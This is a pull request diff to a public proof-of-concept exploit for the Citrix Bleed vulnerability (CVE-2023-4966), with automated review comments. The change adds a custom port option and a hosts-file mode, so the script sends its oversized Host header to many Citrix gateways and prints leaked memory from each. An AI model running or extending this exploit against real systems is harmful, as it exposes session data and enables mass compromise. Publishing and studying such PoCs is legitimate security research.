added custom port and ability to supply a list of hosts #5

Open: wants to merge 2 commits into base: main
8 changes: 5 additions & 3 deletions citrix/CVE-2023-4966/README.md
Expand Up @@ -7,9 +7,11 @@ Read more at our blog: [https://www.assetnote.io/resources/research/citrix-bleed
# Usage:

```
usage: exploit.py [-h] [--target TARGET]
usage: exploit.py [-h] [--target TARGET] [--port PORT] [--file FILE]

optional arguments:
-h, --help show this help message and exit
--target TARGET The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-h, --help show this help message and exit
--target TARGET The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-p PORT, --port PORT Default target port
--file FILE Path to a text file containing a list of hosts, one per line
```
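Review bot: The new usage line and the `--port` entry in this README block do not match what the parser in exploit.py will print. The option is declared there as `"-p", "--port"` with help text "Target port" and `default = 443`, so argparse renders `[-p PORT]` in the usage line and "Target port" in the option list, while the README shows `[--port PORT]` and "Default target port". Paste the real `-h` output here, and put the 443 default into the help string so the README and the tool agree.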
28 changes: 20 additions & 8 deletions citrix/CVE-2023-4966/exploit.py
Expand Up @@ -8,22 +8,34 @@

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
parser.add_argument("-p", "--port", help = "Target port", default = 443)
parser.add_argument('--file', help='Path to a text file containing a list of hosts, one per line')
args = parser.parse_args()

if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200)')
if args.target is None and args.file is None:
print('Either a target or a file containing hosts must be provided (e.g., --target 192.168.1.200 or --file hosts.txt)')
sys.exit(0)

hostname = args.target

if __name__ == "__main__":
def test_host(hostname, port):
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
r = requests.get(f"https://{hostname}:{port}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False, timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(f"--- Dumped Memory for {hostname}:{port} ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
print(f"Could not dump memory for {hostname}:{port}")

if args.target:
hostname = args.target
port = int(args.port)
test_host(hostname, port)

if args.file:
with open(args.file, 'r') as file:
for line in file:
hostname = line.strip()
port = int(args.port)
test_host(hostname, port)
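Review bot: `--port` is parsed as a string and only converted with `port = int(args.port)` in the two blocks at the bottom of the hunk, so a non-numeric value raises an uncaught ValueError after parsing, and in the `--file` loop the same conversion is repeated for every line. Declare the option with `type=int` in `parser.add_argument("-p", "--port", ...)` so argparse rejects bad input with a usage error, and pass `args.port` straight to `test_host`. Separately, replacing `if __name__ == "__main__":` with `def test_host(hostname, port):` leaves the `if args.target:` and `if args.file:` dispatch at module level, so it runs on import; keep the guard around those two blocks. The missing-argument branch also still ends in `sys.exit(0)`; a non-zero status would let a caller tell a usage error from a normal run.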